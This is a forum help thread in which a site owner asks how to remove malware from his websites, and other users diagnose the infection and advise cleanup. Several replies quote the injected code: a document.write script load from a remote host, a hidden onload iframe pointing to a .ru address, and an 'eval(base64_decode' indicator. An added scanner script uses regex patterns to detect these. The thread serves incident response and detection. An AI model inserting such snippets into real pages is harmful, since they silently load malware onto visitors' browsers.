All my websites are blocked
by ranjith_tiru84
4 months ago

Hi,
I am using a GoDaddy server on which I have registered all my websites under the parent domain levicent.in. Now I have been attacked by malware. How do I remove it? I need help with this. Thanks.

by redleg
4 months ago

Check all your jscript files, at the bottom of

http://levicent.in/examples/Scripts/AC_RunActiveContent.js

are a bunch of

document.write('<script src=http://shoba.in/block/Website_Page_Under_Construction.php ><\/script>');

Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especially FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.

Once the site is secure and clean you need to submit a request for review in your Google WMT account to have the warning removed. If you have not verified ownership of the site you will have to do so first. The following reference explains the procedure.

http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites

by ranjith_tiru84
4 months ago

If I delete all the files in js, especially the ones you suggested, and after that remove the files from my server and upload them again, is that OK for now? Please guide me. Thanks for your reply and suggestions.

by redleg
4 months ago

If you have known clean copies of your javascript files then you can delete the ones from your server and upload new copies.

You also have the same line

<script src=http://shoba.in/block/Website_Page_Under_Construction.php ></sc ript>

showing up in between the </head> and <body> tags of your html pages. If you do not see it in the source it is being inserted at runtime.

It shows up in all these pages


by rathaus
4 months ago

Hi ranjith,

Your site is still showing up as infected. It is either being modified after you upload it, by an automated script of some kind installed on the server, or it was modified at the source, on your computer.

In any case, our scans still show multiple infections of:
< iframe frameborder="0" onload="if (!this.src){ this.src='http://qualitysuper.ru:8080/index.php'; this.height='0'; this.width='0';}" >
and
< script src=http://shoba.in/block/Website_Page_Under_Construction.php >< /script>

Which is malicious in nature.

As the site appears to contain multiple instances of the same “code”, I would guess your base template has been infected.

Removing them should resolve the problem.

You, however, also need to discover how your site was intruded into to prevent this from happening again.

Thanks,
Noam Rathaus
Beyond Security

by ranjith_tiru84
4 months ago

Hi,
Is your suggestion that we have to change the templates of the website? Do we have to make new templates for that site? Please guide me. Thanks for your reply.

by Kaleh
4 months ago

It sounds as if you may have the type of situation discussed in the following article:

The “onload if this” website infection
http://www.wewatchyourwebsite.com/wordpress/?p=278

It appears that some of these recurring infections originate with a local computer that is infected with malware. Did you follow redleg’s instructions about checking your local computer(s) and changing all passwords, etc?

Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, change ALL passwords especially FTP, it is likely your passwords have been compromised. Never store/save your passwords in your FTP client, use secure FTP if available.

While this may be enough, in some cases, to prevent reinfection (after removing all obvious malicious code), there are times that there is a back-door that you must still find, in addition to any other code that you are removing manually.

The WeWatch article says:

If your website is getting hacked over and over again, you should scan all your website files for any occurrence of this string
eval(base64_decode
Don’t just delete any file with that string in it because we have seen various files where that is used legitimately, however, close examination of any file with that string is suggested.

You will have to thoroughly examine all content of your site, especially for additional files that don’t belong. Sometimes there are gifimg.php (or other .php files) in various images folders.
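
One way to run the checks described in this thread across a site's files: the `eval(base64_decode` string, injected remote script tags, the hidden onload iframe, and stray .php files in image folders. This is an added example, not part of the original posts; the folder names, file extensions and the `bad.example` / `www.example.org` hosts are assumptions, and every hit is meant for manual review rather than automatic deletion.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in this thread; a hit means "inspect by hand", not "delete".
PATTERNS = {
    "eval-base64": re.compile(rb"eval\s*\(\s*base64_decode", re.I),
    "onload-iframe": re.compile(rb"<\s*iframe[^>]*onload\s*=[^>]*this\.src", re.I),
    "remote-script": re.compile(
        rb"<\s*script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\s\"'>]+)", re.I),
}
TEXT_EXT = {".js", ".html", ".htm", ".php", ".inc", ".tpl"}
MEDIA_DIRS = {"images", "img", "gallery", "uploads"}  # assumed folder names

def scan(webroot, own_hosts):
    """Return sorted (relative_path, finding) pairs for manual review."""
    findings = set()
    for path in Path(webroot).rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(webroot)
        ext = path.suffix.lower()
        if ext == ".php" and MEDIA_DIRS & {p.lower() for p in rel.parts[:-1]}:
            findings.add((rel.as_posix(), "php-in-media-dir"))
        if ext not in TEXT_EXT:
            continue
        data = path.read_bytes()
        for label, rx in PATTERNS.items():
            for m in rx.finditer(data):
                host = m.group(1).decode("ascii", "replace").lower() if m.groups() else ""
                if host not in own_hosts:  # skip scripts served from the site itself
                    findings.add((rel.as_posix(), f"{label}:{host}" if host else label))
    return sorted(findings)

def demo():
    # Constructed sample tree; bad.example and www.example.org are placeholders.
    samples = {
        "index.html": b"</head><script src=http://bad.example/x.php ></script><body>",
        "js/menu.js": b"var a;\ndocument.write('<script src=http://bad.example/x.php ><\\/script>');",
        "js/ok.js": b"document.write('<script src=\"http://www.example.org/a.js\"><\\/script>');",
        "images/gifimg.php": b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>",
        "about.html": b"<iframe onload=\"if (!this.src){ this.src='http://bad.example:8080/'; }\">",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan(root, own_hosts={"www.example.org"})
```

Run `scan()` against a downloaded copy of the site and compare the flagged files with known clean copies before re-uploading.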

by 12056
4 months ago

Please REMOVE ALL links to hXXp://shoba.in, including any PHP or JS references as they link to the below malware sites!

The SOURCE CODE FOR hXXp://shoba.in is listed below:


From the looks of the coding, it probably contains some exploits with all the \xa#.

by 12056
4 months ago

I found this hidden in the source code of your main page (hXXP://levicent.in), so I am led to believe that it is in ALL the pages that have been flagged as malicious.

INFECTED CODE:

The <> (Brackets) were removed to prevent accidental clicking…

script src=hXXp://shoba.in/block/Website_Page_Under_Construction.php

by ranjith_tiru84
4 months ago

Hi,
Is there any other free software to remove all the malware scripts and files on the server, on the website and also on the local system? Please help me with this. Thanks a million for your help.